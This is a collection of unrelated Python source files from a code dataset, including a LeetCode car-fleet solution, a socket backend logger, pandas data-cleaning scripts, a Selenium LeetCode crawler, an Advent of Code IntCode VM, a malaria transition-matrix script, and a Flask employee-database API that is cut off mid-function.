[xgrid,ygrid,var_p]\n","sub_path":"GECCO2.py","file_name":"GECCO2.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"625747986","text":"\"\"\"\n853. Car Fleet\nMedium\n\nN cars are going to the same destination along a one lane road. The destination is target miles away.\n\nEach car i has a constant speed speed[i] (in miles per hour), and initial position position[i] miles towards the target along the road.\n\n***A car can never pass another car ahead of it, but it can catch up to it, and drive bumper to bumper at the same speed.\n\nThe distance between these two cars is ignored - they are assumed to have the same position.\n\nA car fleet is some non-empty set of cars driving at the same position and same speed. 
Note that a single car is also a car fleet.\n\nIf a car catches up to a car fleet right at the destination point, it will still be considered as one car fleet.\n\nHow many car fleets will arrive at the destination?\n\nExample 1:\n\nInput: target = 12, position = [10,8,0,5,3], speed = [2,4,1,1,3]\nOutput: 3\nExplanation:\nThe cars starting at 10 and 8 become a fleet, meeting each other at 12.\nThe car starting at 0 doesn't catch up to any other car, so it is a fleet by itself.\nThe cars starting at 5 and 3 become a fleet, meeting each other at 6.\nNote that no other cars meet these fleets before the destination, so the answer is 3.\n\nExplanation\nSort cars by the start positions pos\nLoop on each car from the end to the beginning\nCalculate its time needed to arrive the target\ncur records the current biggest time (the slowest)\n\nIf another car needs less or equal time than cur,\nit can catch up this car fleet.\n\nIf another car needs more time,\nit will be the new slowest car,\nand becomes the new lead of a car fleet.\n\nforloop에서\n=> sorted에서 position이 앞서서 앞인데 speed떄문에 시간은 더걸리는 경우가 있으니까 그걸로 체크하는 것\n\"\"\"\n\n\nclass Solution(object):\n def carFleet(self, target, pos, speed):\n \"\"\"\n :type target: int\n :type position: List[int]\n :type speed: List[int]\n :rtype: int\n \"\"\"\n time = [float(target - p) / s for p, s in sorted(zip(position, speed))]\n res = cur = 0\n for t in time[::-1]:\n if t > cur:\n res += 1\n cur = t\n return res\n\n\ntarget, position, speed = 12, [10, 8, 0, 5, 5, 3], [2, 4, 1, 3, 1, 3]\ns = Solution()\ntest = s.carFleet(target, position, speed)\nprint(test)\n","sub_path":"sort_medium/1128_car_fleet.py","file_name":"1128_car_fleet.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"139374967","text":"#/usr/bin/env python3\n# coding=utf-8\n\n# stdlib\nimport socket\nimport sys\nimport platform\nimport array\ntry:\n\timport selectors\nexcept ImportError:\n\t# py2 compatibility\n\timport selectors2 as selectors\nimport socket\n\n__all__=(\"BaseBackend\", \"Queue\", \"BackendLogger\")\n\nclass BackendLogger(object):\n\t\"\"\"\n\t\tLogger for backends.\n\t\tIt can print log on stdout and in a file\n\t\tIf you would log errors, you can add Exception to a logger\n\t\tand also raise that\n\n\t\tLevels:\n\t\t\t- msg:\n\t\t\t\t- chat data from backends\n\t\t\t\t- format: None\n\t\t\t\t- color: None\n\t\t\t- info:\n\t\t\t\t- useful infos for user\n\t\t\t\t- format [INFO]\n\t\t\t\t- color: green\n\t\t\t- warning:\n\t\t\t\t- warning about backend state\n\t\t\t\t- format: [WARNING]\n\t\t\t\t- color: yellow\n\t\t\t- error:\n\t\t\t\t- Exception from backend, usually was normal exception\n\t\t\t\t- format: [ERROR]\n\t\t\t\t- color: magenta\n\t\t\t- critical:\n\t\t\t\t- Crash of program, it raise the exception\n\t\t\t\t- format: [CRITICAL]\n\t\t\t\t- color: red\n\t\t\t- debug:\n\t\t\t\t- Debug informations\n\t\t\t\t- format: [DEBUG]\n\t\t\t\t- color: cyan\n\t\"\"\"\n\tLEVELS=(\"critical\", \"msg\", \"info\", \"warning\", \"error\", \"debug\")\n\tdef __init__(self, level=0, filelog=None, allow_print=True, raise_error=False):\n\t\t\"\"\"\n\t\t\tCreate a Logger\n\t\t\tNOTE: \tdon't add parameter level directly because it's in binary format,\n\t\t\t\t\tuse level_encode instead.\n\t\t\"\"\"\n\t\tsuper(BackendLogger, self).__init__()\n\t\tself._level=level\n\t\tself.allow_print=allow_print\n\t\tself.raise_error=raise_error\n\t\tif 
platform.system().upper()==\"LINUX\":\n\t\t\tself._allow_color=True\n\t\tself.filelog=filelog\n\t@staticmethod\n\tdef level_encode(**kwargs):\n\t\tkwargs.setdefault(\"critical\", False)\n\t\tkwargs.setdefault(\"msg\", False)\n\t\tkwargs.setdefault(\"info\", False)\n\t\tkwargs.setdefault(\"warning\", False)\n\t\tkwargs.setdefault(\"error\", False)\n\t\tkwargs.setdefault(\"debug\", False)\n\t\tlogargs=array.array(\"B\")\n\t\tfor F in BackendLogger.LEVELS:\n\t\t\tlogargs.append(kwargs[F])\n\t\treturn logargs\n\tdef _writelog(self, typelog, msg, color=None):\n\t\tif self.allow_print:\n\t\t\tif self._allow_color and color is not None:\n\t\t\t\tprint(\"[\\033[{2};1;1m{0}\\033[0m]: {1}\".format(typelog, msg, color))\n\t\t\telse:\n\t\t\t\tprint(msg)\n\t\tif self.filelog is not None:\n\t\t\tself.filelog.write(\"[{}]: []\".format(typelog, msg))\n\tdef checklevel(self, level):\n\t\treturn self._level[level]\n\t# log levels\n\tdef debug(self, msg):\n\t\tif self.checklevel(5):\n\t\t\tself._writelog(\"DEBUG\", msg, 36)\n\t\t\treturn True\n\t\treturn False\n\tdef msg(self, msg):\n\t\tif self.checklevel(1):\n\t\t\tif self.allow_print:\n\t\t\t\tprint(msg)\n\t\t\tif self.filelog is not None:\n\t\t\t\tself.filelog.write(\"[MSG]: \" + msg)\n\tdef info(self, msg):\n\t\tif self.checklevel(2):\n\t\t\tself._writelog(\"INFO\", msg, 32)\n\t\t\treturn True\n\t\treturn False\n\tdef warning(self, msg):\n\t\tif self.checklevel(3):\n\t\t\tself._writelog(\"WARNING\", msg, 33)\n\t\t\treturn True\n\t\treturn False\n\tdef error(self, e):\n\t\tif self.checklevel(4):\n\t\t\tself._writelog(\"ERROR\", e, 35)\n\t\t\tif self.raise_error:\n\t\t\t\traise e\n\t\t\treturn True\n\t\treturn False\n\tdef critical(self, e):\n\t\tif self.checklevel(0):\n\t\t\tself._writelog(\"CRITICAL\", e, 31)\n\t\t\traise e\n\t\t\treturn True\n\t\treturn False\n\nclass BaseBackend(object):\n\t\"\"\"\n\t\tBase class for socket backend.\n\t\tThis class provides:\n\t\t\t- some methods for tools.parsercommand.BaseParserCommand\n\t\t\t- an output queue for receve raw data\n\t\t\t- a mainloop for socket\n\t\t\t- inhiterable interface for parsing metadata\n\t\"\"\"\n\tdef __init__(self, addr, port, **kwargs):\n\t\tkwargs.setdefault(\"buffer_size\", 16892)\n\t\tkwargs.setdefault(\"verbose\", 0)\n\t\tkwargs.setdefault(\"allow_print\", False)\n\t\tkwargs.setdefault(\"raise_error\", False)\n\t\tsuper(BaseBackend, self).__init__()\n\t\tself.is_running=False\n\t\tself.addr=addr\n\t\tself.port=port\n\t\tself.buffer_size=kwargs.get(\"buffer_size\")\n\t\tself.sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tself.select=selectors.DefaultSelector()\n\t\tself.outqueue=Queue()\n\t\t# Verbosity\n\t\tverbose=kwargs[\"verbose\"]\n\t\tself.logger=BackendLogger(BackendLogger.level_encode(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tcritical=verbose>0,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tmsg=verbose>0,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tinfo=verbose>1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\twarning=verbose>2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\terror=verbose>3,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tdebug=verbose>4,\n\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\tallow_print=kwargs[\"allow_print\"],\n\t\t\t\t\t\t\t\traise_error=kwargs[\"raise_error\"],\n\t\t)\n\tdef add_msg(self, msg):\n\t\tself.outqueue.put(msg)\n\t\tself.logger.msg(msg)\n\tdef close(self):\n\t\tself.is_running=False\n\t\tself.sock.close()\n\tdef socketloop(self):\n\t\tself.is_running=True\n\t\tself.logger.debug(\"start socketloop\")\n\t\twhile self.is_running:\n\t\t\tself.run()\n\t\tself.is_running=False\n\t\tself.logger.debug(\"end 
socketloop\")\n\tdef parse_metadata(self, peer, metadata):\n\t\tif len(metadata)==0:\n\t\t\treturn True\n\t\treturn False\n\tdef run(self):\n\t\traise NotImplementedError()\n\nclass Queue(object):\n\t\"\"\"\n\t\tQueue class:\n\t\t\tThis class provides a queue data structure\n\t\t\tIt also have a system for remove automatically the last element with a number of get call\n\t\"\"\"\n\t__slots__=(\"elements\", \"maxget\")\n\tdef __init__(self):\n\t\tsuper(Queue, self).__init__()\n\t\tself.elements=[]\n\t\tself.maxget=[]\n\tdef __len__(self):\n\t\treturn len(self.elements)\n\tdef put(self, element, max_get=None):\n\t\tself.maxget.append(None)\n\t\tself.elements.append(element)\n\tdef get(self):\n\t\tif not len(self.maxget):\n\t\t\treturn None\n\t\tif self.maxget[0]:\n\t\t\tself.maxget[0]-=1\n\t\t\tif self.maxget==0:\n\t\t\t\treturn self.elements.pop()\n\t\telif not self.elements:\n\t\t\treturn None\n\t\treturn self.elements[0]\n\tdef pop(self):\n\t\tif not len(self.maxget):\n\t\t\treturn None\n\t\tif not self.elements:\n\t\t\treturn None\n\t\tif self.maxget[0]:\n\t\t\tdel self.maxget[0]\n\t\t\treturn self.elements.pop()\n","sub_path":"backend/basebackend.py","file_name":"basebackend.py","file_ext":"py","file_size_in_byte":5458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"581210358","text":"# coding: utf-8\nimport os\nimport pandas as pd\nimport numpy as np\nimport json # to dump python dict\n\n\n# --- load manually checked replacement schemes for equivalent brand names ---\nfolder = './raw/'\nfname = 'brand_dist_1_v1_janzen.csv'\ndf_d1_v1 = pd.read_csv(os.path.join(folder, fname))\nfname = 'brand_dist_1_v1_glassy.csv'\ndf_d1_v2 = pd.read_csv(os.path.join(folder, fname), encoding='ISO-8859-1') # glassy's can't be opened with utf-8\n\n\n# --- get indices for different and same pairs ---\ndiff_idx = df_d1_v1[df_d1_v2['replacable'] != df_d1_v1['replacable']].index\nsame_idx = df_d1_v1[df_d1_v2['replacable'] == df_d1_v1['replacable']].index\nprint(\"num diff between two replace scheme:\", len(diff_idx))\n\n\n# --- get replaceable pairs agreed by both schemes ---\ndf_same = df_d1_v1.iloc[same_idx]\ndf_p1 = df_same[df_same['replaceable'] == 1]\ndict_p1 = {row['brand_B']: row['brand_A'] for i, row in df_p1.iterrows()} # generate dict\nprint(\"num tuples in v1 replace dict:\", len(dict_p1))\n\n\n# --- save part 1 replacement dictionary ---\nfolder = './checked/'\nfname = 'brand_d1_p1.dict'\nif not os.path.exists(folder):\n os.makedirs(folder)\nwith open(os.path.join(folder, fname), 'w') as f:\n json.dump(dict_p1, f, indent=2)\n\n\n# --- view diff pairs ---\nprint(df_d1_v1.iloc[diff_idx])\nprint(df_d1_v2.iloc[diff_idx])\n\n\n# --- load train data to inspect ---\nfolder = '../../data/raw/'\nfname = 'train.tsv'\ndf_train = pd.read_table(os.path.join(folder, fname))\nfname = 'test.tsv'\ndf_test = pd.read_table(os.path.join(folder, fname))\n\n\n# --- helper function to find subset of DataFrame with certain brand ---\ndef df_with_brand(df, bname):\n return df[df['brand_name'] == bname]\n\n\n# --- view brands ---\ndf_with_brand(df_train, 'Camilla') # only one is left here because I did the inspection in Jupyter Notebook\ndf_with_brand(df_test, 'Camilla') # only one is left here because I did the inspection in Jupyter Notebook\n\n\n# --- confirmed replacable pairs ---\np2_idx = [68, 86, 87, 95, 106, 156, 267, 277, 366, 378]\nspecial_brand_list = [\"Athelete\", \"MATRIX\", \"Elements\", \"Curve\"] # mislabelled brands found here\ndf_p2 = 
df_d1_v1.iloc[p2_idx]\ndict_p2 = {row['brand_B']: row['brand_A'] for _, row in df_p2.iterrows()} # generate dict\n\n\n# --- save part 2 replacement dictionary ---\nfolder = './checked/'\nfname = 'brand_d1_p2.dict'\nwith open(os.path.join(folder, fname), 'w') as f:\n json.dump(dict_p2, f, indent=2)\n\n\n# --- save mislabelled brands list ---\nfname = 'brand_mislabeled_p1..lst'\nwith open(os.path.join(folder, fname), 'w') as f:\n for val in special_brand_list:\n f.write(val + '\\n')\n\n\n# --- load manually checked replacement schemes for special characters ---\nfolder = './raw/'\nfname = 'char_v1.csv'\ndf_char_v1 = pd.read_csv(os.path.join(folder, fname))\ndf_char_v1['to_replace_with'] = df_char_v1['to_replace_with'].map(\n lambda x: x if len(x) == 1 else \" {} \".format(x.strip()) # if the string used to replace is a word, add spaces\n)\ndict_char = {row['character']: row['to_replace_with'] for _, row in df_char_v1.iterrows()} # generate dict\n\n\n# --- save replacement dictionary ---\nfolder = './checked'\nfname = 'char_v1.dict'\nwith open(os.path.join(folder, fname), 'w') as f:\n json.dump(dict_char, f, indent=2)\n\n\n# --- load manually checked fillable brand_name(A-K) from name ---\nfolder = './raw/'\nfname = 'brand_in_name_A_K.xlsx'\nws = pd.read_excel(os.path.join(folder, fname),\n sheet_name=\"results\", usecols=[\"index\", \"name\", \"replace\"],\n dtype={\"index\": np.int32, \"name\": str, \"replace\": np.int8}) # ws for worksheet\nws['name'] = ws['name'].map(lambda x: x.replace('.test.tsv', '').replace('@@slash@@', '/')) # correct error and decode\n\n\n# --- get replaceable, not replaceable and to-be-determined brands ---\nbin_no_repl = {} # to store brands; bin for \"brand in name\", repl for replaceable\nbin_repl = {}\nbin_empty = {}\nbin_no_repl[\"A_K\"] = ws[ws[\"replace\"] == 0][\"name\"].tolist()\nbin_repl[\"A_K\"] = ws[ws[\"replace\"] == 1][\"name\"].tolist()\nbin_empty[\"A_K\"] = ws[ws[\"replace\"] == 2][\"name\"].tolist()\n\n\n# ===== helper class =====\nclass FileSaver:\n def __init__(self, folder):\n self.folder = folder\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n def save_list(self, lst, fname):\n assert isinstance(lst, list), \"\\\"lst\\\" must be an instance of list\"\n with open(os.path.join(self.folder, fname + \".lst\"), 'w') as f:\n for v in lst:\n f.write(str(v) + '\\n')\n\n def save_dict(self, dic, fname, **kw):\n assert isinstance(dic, dict), \"\\\"dic\\\" must be an instance of dict\"\n kw.setdefault(\"indent\", 2)\n with open(os.path.join(folder, fname + \".dict\"), 'w') as f:\n json.dump(dic, f, **kw)\n\n\nfs = FileSaver('./checked/')\nfs.save_list(bin_no_repl[\"A_K\"], \"brand_in_name_norepl_A_K\")\nfs.save_list(bin_repl[\"A_K\"], \"brand_in_name_repl_A_K\")\nfs.save_list(bin_empty[\"A_K\"], \"brand_in_name_empty_A_K\")\n\n\nspecial_brand_list2 = []\nspecial_brand_list2.append(\"% Pure\")\n","sub_path":"code/prep/gen_replace_dict.py","file_name":"gen_replace_dict.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"33581497","text":"import requests\nfrom lxml import html\nimport tqdm, time, requests, json\nfrom lxml import etree\nfrom selenium import webdriver\n# from fake_useragent import UserAgent\nimport random, time\n\n## 初始化浏览器\nchromeOptions = webdriver.ChromeOptions()\n# userAgent = UserAgent()\n# if len(self.proxies) != 0:\n# print(\"Use old IP to fetch new IPs...\")\n# chromeOptions.add_argument(f\"--proxy-server={self.proxies}\")\n# 
chromeOptions.add_argument(random.choice(userAgent.data[\"browsers\"][random.choice(userAgent.data_randomize)]))\n# chromeOptions.add_argument('--headless') # use headless mode\ndriverSource = webdriver.Chrome(executable_path=r\"C:\\Users\\XMK23\\Downloads\\chromedriver.exe\",\n chrome_options=chromeOptions)\ndriver = webdriver.Chrome(executable_path=r\"C:\\Users\\XMK23\\Downloads\\chromedriver.exe\",\n chrome_options=chromeOptions)\n\ndriverSource.get(\"https://leetcode-cn.com/problemset/lcof\") #\"https://leetcode-cn.com/problemset/lcof/#page-{}\".format(pageNum))\ntime.sleep(2)\n\n\n## 首先是按页码,一页一页来。\nwhile True:\n try:\n rendered_body = driverSource.page_source\n page_source = etree.HTML(rendered_body)\n ## 获取一页上所有的url\n titles = page_source.xpath('//div[@class=\"question-title\"]/a/text()')\n urls = page_source.xpath('//div[@class=\"question-title\"]/a/@href')\n ## 逐个url进行处理。\n counter = 0\n for title, url in tqdm.tqdm(zip(titles, urls)):\n fullUrl = \"https://leetcode-cn.com\" +url\n driver.get(fullUrl)\n time.sleep(1)\n rendered_body = driver.page_source\n page_source = etree.HTML(rendered_body)\n texts = page_source.xpath('//div[@class=\"notranslate\"]//text()')\n heheda = driver.find_element_by_xpath('//div[@class=\"notranslate\"]')\n ## 打印信息到文件里。\n pyFileName = heheda.parent.title.split(\".\")[0].replace(\"剑指\", \"Jianzhi\").replace(\" \", \"\")\n with open(pyFileName + \".py\", \"w\", encoding=\"utf-8\") as f:\n f.write(\"'''\\n[{}]({})\\n\\n{}'''\\n\".format(heheda.parent.title, fullUrl, \"\".join(texts)))\n # break\n\n button = driverSource.find_element_by_xpath('//a[@class=\"reactable-next-page\"]')\n\n button.click()\n time.sleep(2)\n except:\n break\n\n\n## 最后会崩掉,但是没事的。","sub_path":"LeetcodeProblemCrawling/GeneratePyFilesWithProblem/GetProblems_JianzhiOffer.py","file_name":"GetProblems_JianzhiOffer.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"3405790","text":"from tool.runners.python import SubmissionPy\n\n\nfrom copy import deepcopy\nfrom collections import defaultdict, deque\n\n\nclass IntCodeVM:\n VAL, PTR = 0, 1 # arg modes: value / pointer\n\n INSTRS = {\n 1: (\"plus\", (VAL, VAL, PTR)),\n 2: (\"mul\", (VAL, VAL, PTR)),\n 3: (\"input\", (PTR,)),\n 4: (\"output\", (VAL,)),\n 5: (\"jump_if_true\", (VAL, VAL)),\n 6: (\"jump_if_false\", (VAL, VAL)),\n 7: (\"less_than\", (VAL, VAL, PTR)),\n 8: (\"equals\", (VAL, VAL, PTR)),\n 9: (\"relative_base_incr\", (VAL,)),\n }\n\n def __init__(self, program):\n self.memory = defaultdict(int, {i: elem for i, elem in enumerate(program)})\n self.instr_ptr = 0\n self.relative_base = 0\n self.blocked_stdin = False\n self.stdin = deque()\n self.stdout = deque()\n\n def copy(self):\n return deepcopy(self)\n\n @property\n def stopped(self):\n return self.memory[self.instr_ptr] == 99\n\n def arg(self, n, arg_type, arg_mode):\n assert arg_type in [self.VAL, self.PTR]\n assert arg_mode in [0, 1, 2] if arg_type == self.VAL else [0, 2]\n\n if arg_mode == 0:\n ptr = self.memory[self.instr_ptr + 1 + n]\n elif arg_mode == 1:\n ptr = self.instr_ptr + 1 + n\n elif arg_mode == 2:\n ptr = self.memory[self.instr_ptr + 1 + n] + self.relative_base\n else:\n raise Exception(f\"Unknown arg mode: {mode}\")\n\n return ptr if arg_type == self.PTR else self.memory[ptr]\n\n @classmethod\n def parse_instr(cls, instr):\n opcode = instr % 100\n instr //= 100\n args_types = cls.INSTRS[opcode][1]\n modes = []\n\n for _ in range(len(args_types)):\n modes.append(instr 
% 10)\n instr //= 10\n\n return opcode, modes\n\n def run(self):\n while not self.stopped:\n opcode, modes = self.parse_instr(self.memory[self.instr_ptr])\n instr_name, arg_types = self.INSTRS[opcode]\n\n args = [\n self.arg(n, arg_type, arg_mode)\n for n, (arg_type, arg_mode) in enumerate(zip(arg_types, modes))\n ]\n\n getattr(self, f\"op_{instr_name}\")(args) # self.op_XXX(args)\n\n if self.blocked_stdin:\n return\n\n def op_plus(self, args):\n self.memory[args[2]] = args[0] + args[1]\n self.instr_ptr += len(args) + 1\n\n def op_mul(self, args):\n self.memory[args[2]] = args[0] * args[1]\n self.instr_ptr += len(args) + 1\n\n def op_input(self, args):\n if self.stdin:\n self.memory[args[0]] = self.stdin.popleft()\n self.instr_ptr += len(args) + 1\n self.blocked_stdin = False\n else:\n self.blocked_stdin = True\n\n def op_output(self, args):\n self.stdout.append(args[0])\n self.instr_ptr += len(args) + 1\n\n def op_jump_if_true(self, args):\n if args[0] != 0:\n self.instr_ptr = args[1]\n else:\n self.instr_ptr += len(args) + 1\n\n def op_jump_if_false(self, args):\n if args[0] == 0:\n self.instr_ptr = args[1]\n else:\n self.instr_ptr += len(args) + 1\n\n def op_less_than(self, args):\n self.memory[args[2]] = 1 if args[0] < args[1] else 0\n self.instr_ptr += len(args) + 1\n\n def op_equals(self, args):\n self.memory[args[2]] = 1 if args[0] == args[1] else 0\n self.instr_ptr += len(args) + 1\n\n def op_relative_base_incr(self, args):\n self.relative_base += args[0]\n self.instr_ptr += len(args) + 1\n\n\ndef solve_part2(program):\n n = 50\n vms = [IntCodeVM(program) for _ in range(50)]\n\n for i, vm in enumerate(vms):\n vm.stdin.append(i)\n\n X_nat, Y_nat = None, None # next values to be delivered by the NAT\n Y_delivered = None # last Y value delivered by the NAT\n\n while True:\n idle = True\n\n for i, vm in enumerate(vms):\n assert vm.stopped == False\n\n if vm.blocked_stdin and not vm.stdin:\n vm.stdin.append(-1)\n else:\n idle = False\n\n vm.run()\n assert len(vm.stdout) % 3 == 0\n\n if vm.stdout:\n idle = False\n\n while vm.stdout:\n dest, X, Y = (vm.stdout.popleft() for _ in range(3))\n if dest == 255:\n X_nat, Y_nat = X, Y\n else:\n vms[dest].stdin.extend([X, Y])\n\n if idle:\n if Y_delivered is not None and Y_delivered == Y_nat:\n return Y_delivered\n Y_delivered = Y_nat\n vms[0].stdin.extend([X_nat, Y_nat])\n\n\nclass FranciscoSubmission(SubmissionPy):\n def run(self, s):\n program = list(map(int, s.split(\",\")))\n return solve_part2(program)\n","sub_path":"day-23/part-2/francisco.py","file_name":"francisco.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"157959543","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport copy\n\n\ndef probability_shifting_module(TM, immune_stimulation_threshold,row_scale_factor,column_scale_factor):\n number_of_bin_edges = max([len(i) for i in TM])\n bin_numbers = np.arange(0, number_of_bin_edges)\n new_TM = copy.copy(TM)\n rows_to_cycle_through = np.arange(immune_stimulation_threshold, max(bin_numbers) + 1)\n # define a row scaling factor that represents the changing force of immunity across current density classes\n for row in rows_to_cycle_through:\n Old_column_values = [x for x in TM[row]]\n Bin_decreases = [np.log10(column_scale_factor * row_scale_factor * bin) for bin in bin_numbers]\n New_column_values = [Old_column_values[i] / Bin_decreases[i] for i in range(len(Old_column_values))]\n\n 
Net_zero_column_change = sum(\n [abs(New_column_values[j] - Old_column_values[j]) for j in np.arange(1, len(Old_column_values))])\n New_column_values[0] = Old_column_values[0] + Net_zero_column_change\n new_TM[row] = New_column_values\n\n return(TM,new_TM)\n\ndef set_transition_matrix(cb,TM,scale_factor,immune_stim_threshold = 1):\n old_TM, shifted_TM = probability_shifting_module(TM,immune_stim_threshold, row_scale_factor= scale_factor,column_scale_factor= scale_factor)\n cb.update_params({\"Parasite_Peak_Density_Probabilities\": shifted_TM,\n \".Scale_Factor\": scale_factor})\n\n return {\"scale_factor\": scale_factor}\n\ndef plot_heatmap_transition_changes(old_TM, new_TM):\n diffs =pd.DataFrame(np.zeros((len(old_TM), len(old_TM))))\n\n cmap = 'coolwarm'\n\n for row in range(len(old_TM)):\n for col in range(len(old_TM)):\n diffs[row][col] = old_TM[row][col] - new_TM[row][col]\n\n plt.imshow(diffs,cmap = cmap,vmin = -1, vmax = 1)\n plt.show()\n\nif __name__ == '__main__':\n TM = [\n [1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n [0.373134328, 0.0, 0.358208955, 0.179104478, 0.074626866, 0.014925373, 0.0],\n [0.277108434, 0.0, 0.289156627, 0.301204819, 0.132530120, 0.0, 0.0],\n [0.042253521, 0.0, 0.126760563, 0.232394366, 0.542253521, 0.056338028, 0.0],\n [0.168421053, 0.0, 0.010526316, 0.126315789, 0.410526316, 0.284210526, 0.0],\n [0.176470588, 0.0, 0.058823529, 0.0, 0.235294118, 0.529411765, 0.0]\n ]\n TMpd = pd.DataFrame(TM)\n # What rows am I going to go about scaling? (Reminder... Row 0 transitions from truezero, and Row 6 is from highest density)\n immune_stim_threshold = 6\n # whats the base parameter I want to use to describe how immunity impacts these different density classes?\n row_scale_factor = 1\n # whats the base parameter I want to use to describe how immunity impacts the transitions within a density class?\n column_scale_factor = 1\n\n plt.imshow(-TMpd.T, cmap='coolwarm', vmin=-1, vmax=1)\n plt.show()\n def test_transition_matrix(scale_factor):\n old_TM, shifted_TM = probability_shifting_module(TM, 1, row_scale_factor=scale_factor,\n column_scale_factor=scale_factor)\n\n plot_heatmap_transition_changes(old_TM, shifted_TM)\n\n return (old_TM, shifted_TM)\n for scale_num in [2,5,10,100]:\n old_TM, shifted_TM = test_transition_matrix(scale_num)","sub_path":"examples/malariatherapy/immunity_transitions_configuration.py","file_name":"immunity_transitions_configuration.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"184319401","text":"import TwitterStreamFunctions as tsf\nfrom tweet import Tweet\nimport pandas as pd\n\n# data path of input file\n# remove ../ to run in console\ninputPath = \"../data/1000_raw_tweets.txt\"\n\nraw_tweet_data = open(inputPath, \"r\")\n\n# turn the raw file into tweet objects of desired data\nOrgList = tsf.organize_tweets(raw_tweet_data)\n\n# convert the tweet object into a dict for use in pandas\nListOfDicts = []\nfor item in OrgList:\n dict_holder = Tweet.asDict(item)\n ListOfDicts.append(dict_holder)\n\n# create dataframe of tweets\ndf = pd.DataFrame(ListOfDicts)\n\nname = tsf.prepareTable()\ntsf.loadIntoTable(name, ListOfDicts)\n\n\n\n\n\n\n# outputPath = \"../data/data_frame.txt\"\n# outFile = open(outputPath, \"w\")\n# pd.DataFrame.to_csv(df, 
outputPath)\n\n\n\n\n\n\n\n","sub_path":"scripts/UsingNewFunctions.py","file_name":"UsingNewFunctions.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"7756726","text":"from flask import Flask, request,jsonify\nfrom flask_restful import Resource, Api\nfrom database import *\nimport requests\napi = Api(app)\n\n# Operations On Employee\ndef insert_employee(name,email,pubKey):\n person = Employee.query.filter_by(name=name).filter_by(emailId=email).first()\n if person!=None:\n return False,\" The Employee Is Already Registered .\"\n new_emp=Employee(name,email,pubKey)\n db.session.add(new_emp)\n db.session.commit()\n person = Employee.query.filter_by(name=name).filter_by(emailId=email).filter_by(publicKey=pubKey).first()\n id=person.id\n print(\"1 Row Inserted\")\n return True,f\" The Employee Got Registered with Employee Id {id}.\"\n\ndef email_key(empId):\n person = Employee.query.filter_by(id=empId).first()\n if person==None:\n return False,\"No Employee with this employee Id exists.\"\n data=[]\n data.append(person.emailId)\n data.append(person.publicKey)\n return True,data\n\n#Operations On Groups and Members Of\ndef createGroup(name,admin,members):\n if len(members)==0:\n return False,\"Atleaset One Member Required in Group\"\n e=Employee.query.filter_by(id=admin).first()\n admin_name=e.name\n new_grp=Group(name,admin_name,len(members))\n db.session.add(new_grp)\n createdGrp=Group.query.filter_by(name=name).first()\n createdId=createdGrp.id\n members=list(set(members))\n for empId in members:\n new_grp=MemberOf(empId,createdId)\n db.session.add(new_grp)\n db.session.commit()\n return True,\"Success!! Group Created.\"\n\ndef viewGroup(name_):\n Grp=Group.query.filter_by(name=name_).first()\n if Grp==None:\n return False,\"Sorry!! 
No Such Group Exists.\"\n id=Grp.id\n members=MemberOf.query.filter_by(grpId=id).all()\n members_of_grp=\"\\nThe Members Of The Group Are\\n\"\n\n for emp in members:\n e=Employee.query.filter_by(id=emp.empId).first()\n name=e.name\n #print(name)\n members_of_grp=members_of_grp+name+\"\\n\"\n groupDetails=Grp\n return True,str(Grp)+members_of_grp,members\n\ndef deleteEmpId(empId):\n emp = Employee.query.get(empId)\n if emp==None:\n return False,\"No Employee with the requested EmployeeId exists in the database,or you already deleted the employee with requested EmployeeId.\"\n db.session.delete(emp)\n grps=MemberOf.query.filter_by(empId=empId).all()\n for grp in grps:\n grpId=gpr.id\n delMembership=MemberOf.query.filter_by(empId=empId).filter_by(grpId=grpId)\n db.session.delete(delMembership)\n decGrp= Group.query.get(grpId)\n decGrp.count=decGrp-1;\n if decGrp.count==0:\n db.session.delete(decGrp)\n else:\n db.session.add(decGrp)\n db.session.commit()\n return True,f\"Employee with EmployeeId {empId} got deleted\"\n\ndef deleteAll():\n emp = Employee.query.all()\n print(emp)\n if emp==[]:\n return False,\"No Employee Record to be deleted .\"\n db.session.query(Employee).delete()\n db.session.query(MemberOf).delete()\n db.session.query(Group).delete()\n db.session.commit()\n return True,\"All employees record got deleted\"\n\ndef returnAll():\n employees = db.session.query(Employee)\n emp_list=[]\n if employees==None:\n return False,\"No Employee Registered\"\n #names = db.session.query(Employee.name).all()\n ##pubKeys = db.session.query(Employee.publicKey).all()\n for emp in employees:\n curr_emp={'empId':emp.id,'name':emp.name,'email':emp.emailId}\n emp_list.append(curr_emp)\n return True,emp_list#,names,empIds,pubKeys\n\n\n\n\n\n############################################## APIS\n\n\nclass Insert(Resource):\n def post(self,name,email,dbaPass):\n pubKey=request.get_json()['Key']\n response=insert_employee(name,email,pubKey)\n message={'status':response[0],'reply':response[1]}\n return message, 200\n\nclass Query(Resource):\n def get(self,empId):\n response=email_key(empId)\n message={'status':response[0],'reply':response[1]}\n return 